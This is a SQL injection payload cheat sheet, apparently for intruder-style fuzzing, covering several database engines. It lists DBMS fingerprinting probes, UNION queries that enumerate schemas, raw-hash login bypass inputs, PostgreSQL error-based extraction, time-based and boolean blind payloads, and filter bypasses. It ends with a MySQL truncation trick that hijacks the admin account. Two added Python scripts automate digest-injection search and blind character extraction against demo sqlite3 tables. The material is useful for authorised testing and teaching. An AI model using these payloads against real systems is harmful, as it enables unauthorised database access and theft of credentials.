
SQLi - Intruder Payloads

📚 Resources

🔍 Recon

DBMS Identification

Keyword-based list

Each payload uses a function that exists only on one engine, so it evaluates true there and raises a syntax/unknown-function error everywhere else.

| DBMS | SQL payload |
|---|---|
| MySQL | `conv('a',16,2)=conv('a',16,2)` |
| SQLite | `last_insert_rowid()>1` |
| MSSQL | `BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)` |
| Oracle | `RAWTOHEX('AB')=RAWTOHEX('AB')` |
| PostgreSQL | `pg_client_encoding()=pg_client_encoding()` |
| MS Access | `val(cvar(1))=1` |

Send each one next to a known-true (`1=1`) and known-false (`1=2`) baseline, so that "parsed but false" (e.g. `last_insert_rowid()>1` before any insert on that connection) is not mistaken for an error on a different engine.

SQL queries for discovery

Discovery version

```sql
# - MySQL: ' UNION SELECT @@version, NULL -- -
# - MSSQL: ' UNION SELECT @@version, NULL -- -
# - DB2: ' UNION SELECT versionnumber, NULL FROM sysibm.sysversions -- -
# - Oracle: ' UNION SELECT banner, NULL FROM v$version WHERE rownum = 1 -- -
# - PostgreSQL: ' UNION SELECT version(), NULL -- -
# - SQLite: ' UNION SELECT sqlite_version(), NULL -- -
```

List Databases

```sql
# The number of selected columns must match the original query (two in these examples); pad with NULL
# - MySQL: ' UNION SELECT schema_name, NULL FROM information_schema.schemata -- -
# - MSSQL: ' UNION SELECT name, NULL FROM sys.databases -- -
# - Oracle: ' UNION SELECT username, NULL FROM all_users -- -
# - PostgreSQL: ' UNION SELECT datname, NULL FROM pg_database -- -
# - DB2: ' UNION SELECT schemaname, NULL FROM syscat.schemata -- -
# - SQLite: ' UNION SELECT name, NULL FROM pragma_database_list -- -
```

List Available Tables

```sql
# - MySQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = DATABASE() -- -
# - MSSQL: ' UNION SELECT table_name, NULL FROM information_schema.tables -- -
# - DB2: ' UNION SELECT name, NULL FROM sysibm.systables WHERE creator = CURRENT USER -- -
# - Oracle: ' UNION SELECT table_name, NULL FROM all_tables WHERE rownum <= 10 -- -
# - PostgreSQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'public' -- -
# - SQLite: ' UNION SELECT name, NULL FROM sqlite_master WHERE type='table' -- -
```

List the columns of a specific table

```sql
# Oracle and DB2 store unquoted identifiers in upper case, hence 'USERS' there; the other engines keep the case used at creation
# - MySQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' -- -
# - MSSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' -- -
# - DB2: ' UNION SELECT colname, NULL FROM syscat.columns WHERE tabname = 'USERS' -- -
# - Oracle: ' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'USERS' -- -
# - PostgreSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' -- -
# - SQLite: ' UNION SELECT sql, NULL FROM sqlite_master WHERE name = 'users' AND type = 'table' -- -
```

Comments

| Type | Description | DBMS |
|---|---|---|
| `--` | SQL comment (MySQL requires whitespace after `--`, which is why the payloads above end in `-- -`) | MySQL, MSSQL, SQLite, Oracle, PostgreSQL |
| `#` | Hash comment | MySQL |
| `/**/` | C-style comment, also usable in place of a space | MySQL, MSSQL, SQLite, Oracle, PostgreSQL |
| `` ` `` | Backtick identifier quote; an unbalanced one changes how the rest of the statement is parsed | MySQL |
| `;%00` | Null byte: the remainder of the query is dropped when the driver or parser stops at `\0` | MySQL, MSSQL |

🚪 Post exploit

MD5 - SHA1 (raw digest injection)

When the application hashes the password and concatenates the raw (binary) digest into the query without escaping, e.g. PHP's `md5($password, true)` or `sha1($password, true)`, specific inputs produce digests containing a quote followed by SQL. For the md5 case, `password='` + `'or'6…` + `'` becomes `password='' or '6…'`, and `'6…'` is a non-zero numeric string, so the condition is true.

| Hash | Input | Output (raw; non-printable bytes rendered as �) | Injected fragment |
|---|---|---|---|
| md5 | `ffifdyop` | `'or'6�]��!r,��b` | `'or'` |
| sha1 | `5651578060603509` | `E&�ɶ��'\|\|'8�vjc\�` | `'\|\|'8` |
| sha1 | `178374` | `�ÜÛ¾}_i��a!8Wm'/*´Õ` | `'/*` |
| sha1 | `277c7c` | `VF�I\:X+(�R?�'5r�%` | `'` |

Searching for the string `'/*` in a raw md5 digest:

The resource at this point is a PHP script that brute-forces inputs whose binary digest contains a special character (quote, comment opener) that breaks out of the SQL string.
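The same search, plus the bypass it enables and the parameterised fix, as an added Python example (not the page's PHP script and not code from the original page). It runs against a constructed in-memory sqlite3 table; the table layout, the login query shape, the candidate alphabet and the stored-digest format are assumptions made for the demo.

```python
"""Added example (not from the original page): search for inputs whose raw
md5/sha1 digest contains a SQL-breaking byte sequence, then show the bypass
against a constructed, deliberately vulnerable sqlite3 login query next to a
parameterised one. Table layout, query shape and candidate alphabet are
assumptions made for this demo."""
import hashlib
import itertools
import sqlite3
import string

ALPHABET = string.ascii_lowercase + string.digits


def raw_digest(password: str, algo: str = "md5") -> bytes:
    """Binary digest, i.e. what PHP's md5($p, true) / sha1($p, true) return."""
    return hashlib.new(algo, password.encode()).digest()


def find_raw_hash_injection(pattern: bytes, algo: str = "md5",
                            max_attempts: int = 200_000):
    """Enumerate candidates deterministically (a, b, ..., aa, ab, ...) and return
    the first one whose raw digest contains `pattern`, e.g. b"'or'" or b"'/*".
    Roughly (digest_len - len(pattern) + 1) / 256**len(pattern) of all inputs
    match, so a 3-byte pattern needs on the order of a million attempts and a
    4-byte one far more: raise max_attempts for real searches."""
    attempts = 0
    for length in itertools.count(1):
        for chars in itertools.product(ALPHABET, repeat=length):
            candidate = "".join(chars)
            if pattern in raw_digest(candidate, algo):
                return candidate
            attempts += 1
            if attempts >= max_attempts:
                return None


def setup_db() -> sqlite3.Connection:
    """Constructed users table; the password column holds the raw md5 digest
    stored as latin-1 text, mirroring an app that concatenates binary hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)",
                ("admin", raw_digest("correct-horse").decode("latin-1")))
    return con


def vulnerable_login(con, username: str, password: str) -> bool:
    """Vulnerable: the raw digest is spliced into the SQL string. For the
    password 'ffifdyop' the md5 digest begins with  'or'6  so the WHERE clause
    becomes  password='' or '6...'  and the text '6...' converts to the
    non-zero number 6, i.e. true (MySQL applies the same truthiness rule)."""
    raw = raw_digest(password).decode("latin-1")
    sql = ("SELECT username FROM users "
           f"WHERE username='{username}' AND password='{raw}'")
    return con.execute(sql).fetchone() is not None


def safe_login(con, username: str, password: str) -> bool:
    """Hardened: bound parameters keep the digest as data, never SQL. (A real
    application should also use a salted password hash such as bcrypt or
    argon2 rather than plain md5.)"""
    raw = raw_digest(password).decode("latin-1")
    row = con.execute("SELECT username FROM users WHERE username=? AND password=?",
                      (username, raw)).fetchone()
    return row is not None


if __name__ == "__main__":
    con = setup_db()
    print("raw md5('ffifdyop') =", raw_digest("ffifdyop"))
    print("vulnerable login with 'ffifdyop':", vulnerable_login(con, "admin", "ffifdyop"))
    print("safe login with 'ffifdyop':", safe_login(con, "admin", "ffifdyop"))
    print("input with b\"'o\" in its md5:", find_raw_hash_injection(b"'o"))
```

The search is deliberate rather than random so a run is reproducible; a two-byte pattern is found in a few thousand attempts, while `'or'` followed by a digit is the kind of multi-day search that produced `ffifdyop`.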

Error Based

Force a type-conversion error so the DBMS echoes the selected value inside its error message. The payloads below are PostgreSQL (`chr()`, `||`, `current_database()`, `cast`); each is an extra expression appended to the vulnerable SELECT list, hence the leading comma. The column and table names in the last two lines are placeholders.

```sql
-- Create your error: casting text to a number puts the text into
-- "invalid input syntax for type numeric/integer: ..."

-- Get db (chr(95) prepends '_' so the name is easy to spot in the error)
,cast((chr(95)||current_database()) as numeric)

-- Get table (walk the list with OFFSET 0, 1, 2, ...)
,cast(( SELECT table_name FROM information_schema.tables WHERE table_catalog=current_database() LIMIT 1 OFFSET 1 ) as numeric)

-- Get columns (the chr() sequence spells the table name, here m3mbr35t4bl3, without using quotes)
,(cast(( SELECT column_name FROM information_schema.columns WHERE table_name=chr(109)||chr(51)||chr(109)||chr(98)||chr(114)||chr(51)||chr(53)||chr(116)||chr(52)||chr(98)||chr(108)||chr(51) LIMIT 1 OFFSET 0 ) as int))

-- Extract rows, several columns concatenated into one value (chr(32) is a space separator)
,(cast(( SELECT id||chr(32)||us3rn4m3_c0l||chr(32)||p455w0rd_c0l||chr(32)||em41l_c0l FROM m3mbr35t4bl3  LIMIT 1 OFFSET 0) as int))
```

🔍 SQLi - Blind Injection (Intruder Payloads)

⌛ Time-Based

Guess data by measuring response time:

```sql
-- SLEEP() / WAITFOR DELAY behind a condition (the technique sqlmap uses)
' AND SLEEP(5)/*                     -- MySQL; the /* comments out the rest of the query
' AND '1'='1' AND SLEEP(5)           -- MySQL, string context
' ; WAITFOR DELAY '00:00:05' --      -- MSSQL, requires stacked queries
```

✅ Time-Based Payloads with Conditions

```sql
-- MySQL: IF() + SLEEP(), delay only when the first byte of `user` is 'a'
1 AND IF(ASCII(SUBSTRING(user,1,1))=97, SLEEP(5), 0)

-- Boolean CASE (no SLEEP/IF needed); the response content is the oracle
1 AND (SELECT CASE WHEN LENGTH(user)=5 THEN 1 ELSE 0 END) = 1

-- Tautology through a subquery (`dual` exists in MySQL and Oracle); always true, use it as a baseline
1 AND (SELECT 1 FROM dual WHERE 'a'='a')

-- PostgreSQL: pg_sleep() returns void, so wrap it in a subquery that yields a number
1 AND 1=(SELECT CASE WHEN (user LIKE 'a%') THEN (SELECT 1 FROM pg_sleep(5)) ELSE 1 END)
```

🕵️‍♂️ Data Guessing Techniques

🎯 Get length

```sql
1 AND LENGTH(user) = 5                                -- no quotes needed
1 AND LENGTH((SELECT user FROM users WHERE id=1)) = 5

admin' and (select length(password)>7)-- -            -- string context; the comment removes the trailing quote
```

🔤 Extract characters (Blind)

```sql
-- Enumerate the password one character at a time
1 and (select substr(password,1,1)='a')--             -- `--` alone is fine in SQLite/PostgreSQL/MSSQL; MySQL needs `-- -`
1 && substring(password,1,1)='a'--                    -- `&&` is MySQL-only

1 AND ASCII(SUBSTRING(user,1,1)) = 97                 -- 'a'; an integer comparison avoids quotes
1 AND ASCII(SUBSTRING((SELECT user FROM users WHERE id=1),1,1)) = 97
1 AND ASCII(SUBSTRING(user FROM 1 FOR 1)) = 97        -- MySQL/PostgreSQL syntax when the comma is filtered
1 AND ORD(MID(user,1,1)) = 97                         -- MySQL alternatives to ASCII()/SUBSTRING()
1 AND (SELECT SUBSTRING(password,1,1)) = 'a'          -- classic character guessing
```

🔁 Bypass Filters (keywords, characters)

🔒 Blocked Functions (e.g. SUBSTRING, MID, etc.)

When the slicing functions are filtered (`SUBSTRING()`, `SUBSTR()`, `MID()`, `LEFT()`, `RIGHT()`), match prefixes instead:

```sql
-- LIKE: grow the known prefix one character at a time
1 AND user LIKE "a%"               -- starts with 'a' (double-quoted strings are MySQL-only)
1 AND user LIKE "admi%"            -- starts with 'admi'

-- REGEXP (MySQL)
1 && user REGEXP "^a"              -- starts with 'a'
1 AND user REGEXP "^admin$"        -- exact match
```

Under MySQL's default (non-binary) collations both `LIKE` and `REGEXP` are case-insensitive, so the recovered string may differ in case from the stored value; compare as `LIKE BINARY` (or cast the column with `BINARY`) to fix that. Escape `%` and `_` if they may occur in the data.
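The length and character-extraction steps from the sections above, and the LIKE prefix fallback for when the slicing functions are filtered, automated as an added Python example (not code from the original page). It runs against a constructed sqlite3 oracle that stands in for the target's true/false response; the users table, the `id=<input>` query shape, the alphabet and the SQLite function names (`UNICODE()` in place of MySQL's `ASCII()`/`ORD()`) are assumptions for the demo. The LIKE path also shows the case-insensitivity caveat.

```python
"""Added example (not from the original page): boolean-blind extraction
(length, then one character per position) plus the LIKE prefix fallback,
run against a constructed sqlite3 oracle. The users table, the `id=<input>`
query shape and the alphabet are demo assumptions; swap `oracle` for an HTTP
request that returns True on the 'row found' page to use it for real."""
import sqlite3
import string

ALPHABET = string.ascii_lowercase + string.digits + "!"


def make_vulnerable_app():
    """Returns oracle(injected) -> bool for  SELECT ... WHERE id=<injected>
    with the input concatenated unsafely; SQL errors count as 'false'."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    con.execute("INSERT INTO users VALUES (2, 'bob', 'hunter2')")

    def oracle(injected: str) -> bool:
        try:
            sql = f"SELECT user FROM users WHERE id={injected}"
            return con.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False
    return oracle


def get_length(oracle, expr: str, max_len: int = 64) -> int:
    """Step 1:  1 AND LENGTH((SELECT ...)) = n   for n = 0, 1, 2, ..."""
    for n in range(max_len + 1):
        if oracle(f"1 AND LENGTH(({expr})) = {n}"):
            return n
    raise ValueError("length not found within max_len")


def extract_substr(oracle, expr: str, length: int) -> str:
    """Step 2: per position, binary-search the code point with
    1 AND UNICODE(SUBSTR((SELECT ...),pos,1)) > mid   (7 requests per
    character instead of up to 127). UNICODE()/SUBSTR() are the SQLite names
    for ASCII()/SUBSTRING(); rename them for the target engine."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND UNICODE(SUBSTR(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def extract_like(oracle, expr: str, length: int, alphabet: str = ALPHABET) -> str:
    """Fallback when slicing functions are blocked: grow a prefix with
    1 AND (SELECT ...) LIKE 'prefix<c>%'. LIKE is case-insensitive for ASCII
    (SQLite default, MySQL default collations), so the case of the result is
    not reliable; `%` and `_` in the data would also need escaping."""
    prefix = ""
    for _ in range(length):
        for ch in alphabet:
            if oracle(f"1 AND ({expr}) LIKE '{prefix}{ch}%'"):
                prefix += ch
                break
        else:
            break  # nothing matched: the alphabet is incomplete
    return prefix


if __name__ == "__main__":
    oracle = make_vulnerable_app()
    target = "SELECT password FROM users WHERE id=1"
    n = get_length(oracle, target)
    print(n, extract_substr(oracle, target, n), extract_like(oracle, target, n))
```

Against the constructed table, the binary search recovers `S3cret!` exactly, while the LIKE path returns `s3cret!`: same content, wrong case, which is the caveat from the text made visible.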

🔒 Blocked Characters

| Filtered | Alternative |
|---|---|
| `'` (quote) | Numeric comparisons or ASCII logic, e.g. compare `ASCII(SUBSTRING(...))` to an integer |
| `,` (comma) | `FROM..FOR` syntax: `SUBSTRING(col FROM x FOR y)` (MySQL, PostgreSQL) |
| `UNION` | Boolean `EXISTS(...)` or subqueries in the WHERE clause |
| `SLEEP`, `IF` | `CASE WHEN ... THEN ... END` and logical expressions; in MySQL a heavy `BENCHMARK()` call still produces a measurable delay |

🔧 Union & Logic-Based Bypass

🔄 Union Bypass

```sql
-- EXISTS as a boolean oracle instead of UNION
1 AND EXISTS(SELECT 1 FROM users WHERE user LIKE 'admin%')

-- Subquery inside a comparison
1 && (SELECT COUNT(*) FROM information_schema.tables) > 0
```

🧠 Logical Checks (Based on bool)

```sql
1 AND 1=1          -- always true
1 AND 1=2          -- always false
1 && 'a'='a'       -- string comparison; no numeric literal needed
```

Truncation

MySQL-specific. When `sql_mode` is non-strict (no `STRICT_TRANS_TABLES`), a value longer than the column is silently truncated instead of rejected, so an application that checks "username not already taken" before inserting can be tricked:

```sql
-- MySQL with a non-strict sql_mode
CREATE TABLE users (username varchar(10), password varchar(20));
INSERT INTO users VALUES('admin','adminPassword');
-- 'admin' + 20 spaces + 'foo' is not equal to 'admin' at the uniqueness check,
-- but varchar(10) truncates it to 'admin     ' on insert
INSERT INTO users VALUES('admin                    foo','h4ck3dBar');
```

--> two rows now match `WHERE username='admin'`, because comparisons under PAD SPACE collations (e.g. `utf8mb4_general_ci`, `latin1_swedish_ci`) ignore trailing spaces; with a NO PAD collation such as `utf8mb4_0900_ai_ci` (the MySQL 8 default) the trick fails
--> you can log in as admin with your own password (`h4ck3dBar`)